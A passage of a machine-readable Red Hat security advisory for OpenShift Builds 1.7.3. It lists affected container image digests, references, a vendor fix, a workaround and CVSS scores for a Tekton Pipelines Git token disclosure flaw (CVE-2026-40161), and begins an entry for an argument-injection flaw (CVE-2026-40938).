"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64"
],
"known_not_affected": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40161"
},
{
"category": "external",
"summary": "RHBZ#2460173",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460173"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40161",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40161"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40161",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40161"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/issues/9608",
"url": "https://github.com/tektoncd/pipeline/issues/9608"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/issues/9609",
"url": "https://github.com/tektoncd/pipeline/issues/9609"
},
{
"category": "external",
"summary": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-wjxp-xrpv-xpff",
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-wjxp-xrpv-xpff"
}
],
"release_date": "2026-04-21T16:26:27.381000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-08T05:19:34+00:00",
"details": "It is recommended that existing users of Red Hat OpenShift Builds 1.7.2 upgrade to 1.7.3",
"product_ids": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:24359"
},
{
"category": "workaround",
"details": "To mitigate this issue, ensure that the Git API token parameter is always explicitly provided when configuring Tekton Pipelines. Additionally, restrict permissions for creating TaskRun or PipelineRun resources to only trusted users to limit the attack surface. Review and enforce policies that prevent the use of user-controlled serverURLs without proper token authentication. Configuration changes may require a restart or reload of affected services to take effect.",
"product_ids": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/tektoncd/pipeline: Tekton Pipelines: Information disclosure of Git API token via user-controlled serverURL"
},
{
"cve": "CVE-2026-40938",
"cwe": {
"id": "CWE-88",
"name": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
},
"discovery_date": "2026-04-21T21:02:16.557479+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2460292"
}
],
"notes": [
{
